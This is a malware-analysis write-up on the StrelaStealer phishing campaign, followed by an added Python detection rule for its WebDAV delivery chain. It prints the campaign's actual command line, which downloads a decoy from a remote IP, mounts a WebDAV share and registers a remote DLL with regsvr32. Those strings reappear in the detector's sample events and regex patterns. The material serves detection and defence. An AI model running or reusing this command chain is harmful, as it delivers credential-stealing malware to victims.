StrelaStealer - A Credential-Stealing Malware Campaign

This campaign targets a range of industries, including technology, finance, legal services, manufacturing, government, energy, insurance, and construction. It starts with phishing emails carrying attachments that deliver the payload; the emails often masquerade as invoices or other legitimate documents. The payload is a DLL that steals email login credentials and sends them to a server controlled by the threat actor.
The malware is distributed via large-scale spam campaigns. The attachments are usually ZIP files containing a JScript file. Once the ZIP file is opened and the script runs, the JScript file drops a Base64-encoded file and a batch file. The encoded file is decoded into a PE DLL, which is executed with rundll32.exe. The latest version of StrelaStealer uses additional obfuscation, including an updated packer and control-flow obfuscation, to evade detection.
The primary goal is to steal email login credentials, which can then be used in follow-up attacks. The threat actors behind StrelaStealer continuously update their techniques to avoid detection and maintain persistence.
The JS file executes the following command (the WebDAV share is addressed by a UNC path, so the host is written with a leading double backslash):
cmd /c powershell.exe -Command "Invoke-WebRequest -OutFile %temp%\invoice.pdf hxxp://193.143.1.205/invoice.php" && start %temp%\invoice.pdf && cmd /c net use \\193.143.1.205@8888\davwwwroot\ && cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\281681957614368.dll
PowerShell is not used here to fetch the malware itself; it only downloads and opens a decoy PDF (invoice.pdf) so the victim sees what looks like an invoice. The most interesting aspect is the use of WebDAV: the share is mapped with net use and the DLL is then registered with regsvr32 directly from that WebDAV path. The key indicators to watch for are execution of the net use command with "davwwwroot" in the command line, and execution of regsvr32 or rundll32 with "davwwwroot" in the command line.
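The two indicators above can be turned into a small detection rule over process-creation telemetry. The following is an added example, not code from the original write-up: it flags any command line that references a "davwwwroot" path and classifies it by launcher (net use versus regsvr32/rundll32), and it also pulls the WebDAV host and port out of the \\host@port\davwwwroot UNC form so the alert carries the server to pivot on. The event schema (pid / image / cmdline dictionaries) is an assumption standing in for whatever source is available (Sysmon event ID 1, an EDR process stream); the sample events are constructed, with the two malicious lines mirroring the command chain quoted above and the others invented to show the rule stays quiet on ordinary net use and regsvr32 activity.

```python
"""Detection logic for the StrelaStealer WebDAV delivery chain (added example).

Encodes the two indicators from the write-up:
  * `net use` with "davwwwroot" in the command line
  * regsvr32 / rundll32 with "davwwwroot" in the command line
The event format below is an assumption, not a real product schema.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Launchers that can load a DLL straight from a mapped WebDAV path.
DLL_LOADERS = re.compile(r"\b(regsvr32|rundll32)\b", re.I)
# "net use" / "net1 use", with or without the .exe suffix.
NET_USE = re.compile(r"\bnet1?(\.exe)?\s+use\b", re.I)
# WebDAV UNC form used by the campaign: \\host@port\davwwwroot\...  (port optional)
WEBDAV_UNC = re.compile(r"\\\\([^\\@\s]+)(?:@(\d+))?\\davwwwroot", re.I)

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    # benign: ordinary SMB mapping and a vendor DLL registration
    {"pid": 4012, "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use \\fileserver01\share Z: /persistent:no"},
    {"pid": 4020, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32 /s "C:\Program Files\Vendor\control.dll"'},
    # malicious: the two stages quoted in the write-up (trailing "\" appended
    # separately because a raw string cannot end in a backslash)
    {"pid": 4031, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c net use \\193.143.1.205@8888\davwwwroot" + "\\"},
    {"pid": 4032, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s \\193.143.1.205@8888\davwwwroot\281681957614368.dll"},
    # constructed variant using rundll32 and a documentation-range host
    {"pid": 4040, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe \\203.0.113.10@80\davwwwroot\update.dll,DllMain"},
]


@dataclass
class Alert:
    pid: int
    rule: str
    host: Optional[str]
    port: Optional[int]
    cmdline: str


def webdav_origin(cmdline: str):
    """Return (host, port) from a \\host@port\davwwwroot path, or (None, None)."""
    m = WEBDAV_UNC.search(cmdline)
    if not m:
        return None, None
    port = int(m.group(2)) if m.group(2) else None
    return m.group(1), port


def classify(event: dict) -> Optional[Alert]:
    """Apply the two indicators to one process-creation event."""
    cmd = event.get("cmdline", "")
    if "davwwwroot" not in cmd.lower():
        return None  # neither indicator applies
    host, port = webdav_origin(cmd)
    if DLL_LOADERS.search(cmd):
        rule = "webdav_dll_load"        # regsvr32 / rundll32 loading from WebDAV
    elif NET_USE.search(cmd):
        rule = "webdav_share_mount"     # net use mapping the WebDAV share
    else:
        rule = "webdav_path_other"      # davwwwroot seen via some other launcher
    return Alert(event["pid"], rule, host, port, cmd)


def detect_webdav_dll_chain(events: Iterable[dict]) -> List[Alert]:
    """Run classify() over a stream of events and keep only the hits."""
    return [a for a in (classify(e) for e in events) if a is not None]


if __name__ == "__main__":
    for alert in detect_webdav_dll_chain(SAMPLE_EVENTS):
        print(f"pid={alert.pid} rule={alert.rule} host={alert.host} port={alert.port}")
        print(f"    {alert.cmdline}")
```

Two of the three hits share the same host and port, which is the natural key for correlating the mount with the DLL load into a single incident; the third rule ("webdav_path_other") is there so a "davwwwroot" path reached through an unexpected launcher is still surfaced rather than silently dropped.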